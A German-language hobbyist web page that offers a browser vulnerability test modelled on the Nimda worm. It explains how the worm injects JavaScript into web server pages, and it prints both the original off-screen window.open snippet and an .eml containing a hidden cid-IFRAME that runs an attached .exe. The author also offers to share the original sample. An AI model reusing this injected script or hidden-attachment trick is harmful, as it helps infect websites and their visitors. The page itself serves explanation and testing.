das sieht so aus:
dann ist der Browser nicht sicher. Das Programm ist aktiv geworden und kann auf dem Computer machen was es will (entsprechend der Userberechtigung für den eingeloggten User)
zum Browser Test !!!
nach dem Click auf "zum Browser Test !!!"...
| * Wenn jetzt das Programm "readme03.exe" gestartet wird, das sieht so aus: dann ist der Browser nicht sicher. Das Programm ist aktiv geworden und kann auf dem Computer machen was es will (entsprechend der Userberechtigung für den eingeloggten User) |
| * wenn nicht , dann ist soweit alles klar. |
Kurzbeschreibung:
Der Virus/Wurm greift alle Web-Server an, und versucht die html-Dateien zu verändern.
Er hängt ein Javascript an die bestehenden Seiten dran,
das auf den Virus (.eml) verweist (für den Client, Web-Surfer !!!),
und versucht auf dem Web-Server ein Programm zu installieren und zu aktiviern, das weiter
Web-Server angreift.
Beschreibung zur Test-Seite:
| 1) Mit dem Javascript wird ein neues Fenster geöffnet , mit dem
Inhalt "readme03.eml". 2) Dieses ist eine E-Mail Nachricht im HTML-Format, mit einem <IFRAME>-Tag das auf die angehängte .EXE verweist (iframe src=3Dcid:EA4DMGBP9p), und im Original ist height=0 und width=0 (height=3D0 width=3D0), somit nicht zu sehen |
| 1) ... <script language="JavaScript"> window.open("readme03.eml", null, "resizable=yes,top=200,left=200,height=200,width=400") </script> |
| 2) ... <HTML> <HEAD> <TITLE>Test</TITLE> </HEAD> <BODY bgColor=3D#ffffff> hallo<br> <iframe src=3Dcid:EA4DMGBP9p height=3D150 width=3D370> </iframe> </BODY> </HTML> ... |
Das Original:
| Das Original-Script vom NIMDA-Virus sieht so aus: "top=6000, left=6000" !!! => nicht im Bildschirm-bereich, es geht jedoch "Rechte Maustaste" und "Maximize" und noch dazu "resizable=no" |
| ... <script language="JavaScript"> window.open("readme.eml", null, "resizable=no,top=6000,left=6000") </script> |
wenn jemand das Original readme.eml haben will, ich habe es (natürlich noch nicht aufgerufrn und ausgeführt !!!)
| © 2000-2003 Ing. Otmar Pilgerstorfer |